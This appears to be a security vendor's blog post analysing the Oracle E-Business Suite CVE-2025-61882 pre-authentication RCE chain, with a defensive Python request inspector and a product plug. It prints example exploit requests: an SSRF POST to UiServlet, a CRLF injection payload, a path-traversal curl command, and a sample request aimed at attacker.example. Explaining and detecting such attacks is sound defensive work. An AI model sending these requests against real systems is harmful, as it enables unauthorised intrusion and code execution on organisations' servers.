Huseyin Can YUCEEL | 4 MIN READ

CREATED ON October 07, 2025

Oracle EBS CVE-2025-61882 Vulnerability: Pre-auth SSRF Leads to Remote Code Execution

On October 4, 2025, Oracle published a security advisory for CVE-2025-61882, a critical pre-authentication remote code execution vulnerability in Oracle E-Business Suite (EBS). The exploit chains several weaknesses, including server-side request forgery (SSRF), CRLF injection, authentication bypass, and unsafe XSLT processing, to achieve unauthenticated code execution on affected systems. Oracle has confirmed that versions 12.2.3 through 12.2.14 are impacted; organizations are advised to apply patches or mitigations without delay.

In this blog, we explain how the Oracle EBS CVE-2025-61882 exploit works, and provide practical validation and remediation guidance.


Oracle EBS CVE-2025-61882 Vulnerability Explained

Oracle E-Business Suite (EBS) is an integrated suite of enterprise applications designed to help organizations manage and automate core business processes. It combines modules for finance, human resources, supply chain management, customer relationship management, procurement, manufacturing, and project management within a unified platform. 

On October 4, 2025, Oracle released a security advisory for a zero-day vulnerability in Oracle EBS identified as CVE-2025-61882. The vulnerability is a multi-stage exploit chain that combines server-side request forgery (SSRF), CRLF injection, authentication bypass, and unsafe XSLT processing to achieve unauthenticated remote code execution. The vulnerability has a CVSS score of 9.8 (Critical) and affects Oracle EBS versions 12.2.3 through 12.2.14. CVE-2025-61882 is being actively exploited in the wild, including by high-profile threat actors such as the Cl0p ransomware group, which increases the urgency for remediation.

Oracle EBS CVE-2025-61882 Exploit Chain

The CVE-2025-61882 chain begins with a server-side request forgery (SSRF) in the /OA_HTML/configurator/UiServlet endpoint. The servlet accepts an XML document from unauthenticated users via the getUiType parameter. If the redirectFromJsp parameter is present, it parses the XML to extract a return_url and creates an outbound HTTP request. Since the endpoint constructs the target URL directly from untrusted input and follows it using internal client code, an attacker can force the server to contact arbitrary hosts. This SSRF vulnerability provides a critical initial foothold for the rest of the exploit chain.

POST /OA_HTML/configurator/UiServlet HTTP/1.1
Host: <vulnerable_Oracle_EBS>
Content-Type: application/x-www-form-urlencoded

redirectFromJsp=1&getUiType=<?xml version="1.0" encoding="UTF-8"?>
<initialize>
     <param name="init_was_saved">test</param>
     <param name="return_url"><malicious_url></param>
     <param name="ui_def_id">0</param>
     <param name="config_effective_usage_id">0</param>
     <param name="ui_type">Applet</param>
</initialize>

Example 1: Exploiting SSRF vulnerability in Oracle EBS [1]

With SSRF control over the outbound connection, the attacker injects carriage-return/line-feed (CRLF) sequences into the URL payload to manipulate request framing and insert attacker-controlled headers. This CRLF injection lets the adversary convert a simple GET into a crafted POST and smuggle additional request data to downstream services. The exploit then leverages HTTP connection reuse (keep-alive) so the staged requests can be pipelined over the same TCP socket, improving timing reliability and ensuring the victim will fetch further payloads from the attacker-controlled host.

<malicious_url>/HeaderInjectionTest HTTP/1.1\r\nInjectedHeader:Injected\r\n\r\n\r\r\n\r\r\n\r\r\n
POST /

Example 2: URL Decoded CRLF Injection Payload [1]

Armed with a POST-capable SSRF and header control, attackers can now target internal services that are not normally reachable from the public interface. Oracle EBS installations often expose an internal HTTP service bound to a private IP and port (commonly 7201). The exploit uses the known internal hostnames that are frequently present in /etc/hosts and a path-traversal technique to bypass pathname-based authentication filters and retrieve otherwise restricted JSP pages. This step turns an internal-only resource into an attacker-controllable execution path.

curl -s --path-as-is http://<vulnerable_Oracle_EBS>:7201/OA_HTML/help/../ieshostedsurvey.jsp

Example 3: Path Traversal for accessing ieshostedsurvey.jsp [1]

Once the attacker can reach the ieshostedsurvey.jsp endpoint, the JSP constructs an XSL stylesheet URL by concatenating http:// with the incoming Host header and appending /ieshostedsurvey.xsl. The server then creates a URL object and passes it to Java's XSL processing pipeline (XSLStylesheet / XSLProcessor), which downloads and executes the stylesheet. Because Java XSLT supports extension functions and can invoke Java classes, an attacker-supplied XSL file can decode a payload and invoke javax.script or other extensions to run arbitrary code in the JVM. With the final unsafe XSLT processing, attackers gain full remote code execution.
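As an added defender-side example (not code from the original post or from the watchTowr research it cites), the following Python request inspector tags the observable stages of the chain described above: a UiServlet POST whose getUiType XML carries a return_url, CRLF characters inside that URL, a /help/../ traversal segment leading to ieshostedsurvey.jsp, and an unexpected Host header on that JSP. EXPECTED_HOSTS and the sample requests are constructed assumptions; replace the hostnames with those your EBS tier actually serves.

```python
import posixpath
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlencode, urlsplit

EXPECTED_HOSTS = {"ebs.example.internal"}  # assumed: hostnames this EBS tier legitimately serves

def _return_url(body):
    """Stage 1: return_url from the XML in getUiType when redirectFromJsp is present, else None."""
    params = parse_qs(body, keep_blank_values=True)
    if "redirectFromJsp" not in params or "getUiType" not in params:
        return None
    try:
        root = ET.fromstring(params["getUiType"][0])
    except ET.ParseError:
        return None
    for p in root.iter("param"):
        if p.get("name") == "return_url":
            return p.text or ""
    return None

def inspect(path, host, body=""):
    """Return indicator tags for one request; an empty list means nothing chain-like was seen."""
    findings = []
    if path.startswith("/OA_HTML/configurator/UiServlet"):
        url = _return_url(body)
        if url is not None:
            findings.append("ssrf:return_url")
            if re.search(r"[\r\n]|%0[ad]", url, re.I):       # stage 2: CRLF inside the fetched URL
                findings.append("crlf:return_url")
            if urlsplit(url).hostname not in EXPECTED_HOSTS:  # outbound fetch would leave the platform
                findings.append("ssrf:untrusted_target")
    clean = posixpath.normpath(path)                          # stage 3: collapse /help/../ traversal
    if ".." in path.split("/"):
        findings.append("traversal:" + clean)
    if clean.endswith("/ieshostedsurvey.jsp") and host.split(":")[0] not in EXPECTED_HOSTS:
        findings.append("xslt:untrusted_host")                # stage 4: Host header builds the XSL URL
    return findings

# Constructed sample requests (not captured traffic): the chain's entry requests plus a benign one.
XML = '<initialize><param name="return_url">http://attacker.example/x HTTP/1.1\r\nInjected: 1\r\n\r\n</param></initialize>'
SAMPLES = [
    ("/OA_HTML/configurator/UiServlet", "ebs.example.internal",
     urlencode({"redirectFromJsp": "1", "getUiType": XML})),
    ("/OA_HTML/help/../ieshostedsurvey.jsp", "attacker.example", ""),
    ("/OA_HTML/AppsLogin", "ebs.example.internal", ""),
]
```

Feed it decoded access-log or WAF request records; any non-empty result on the internal listener (port 7201 in the write-up) or the public interface is worth triage.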

How Does Picus Help Simulate Oracle EBS CVE-2025-61882 Attacks?

We also strongly suggest simulating the Oracle EBS CVE-2025-61882 vulnerability to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against other vulnerability exploitation attacks, such as regreSSHion, Citrix Bleed, and Follina, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Oracle EBS CVE-2025-61882 vulnerability exploitation attacks:

Threat ID | Threat Name                                  | Attack Module
52564     | Oracle E-Business Suite Web Attack Campaign | Web Application

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

References

[1] "Well, Well, Well. It's Another Day. (Oracle E-Business Suite Pre-Auth RCE Chain - CVE-2025-61882)." Available: https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/
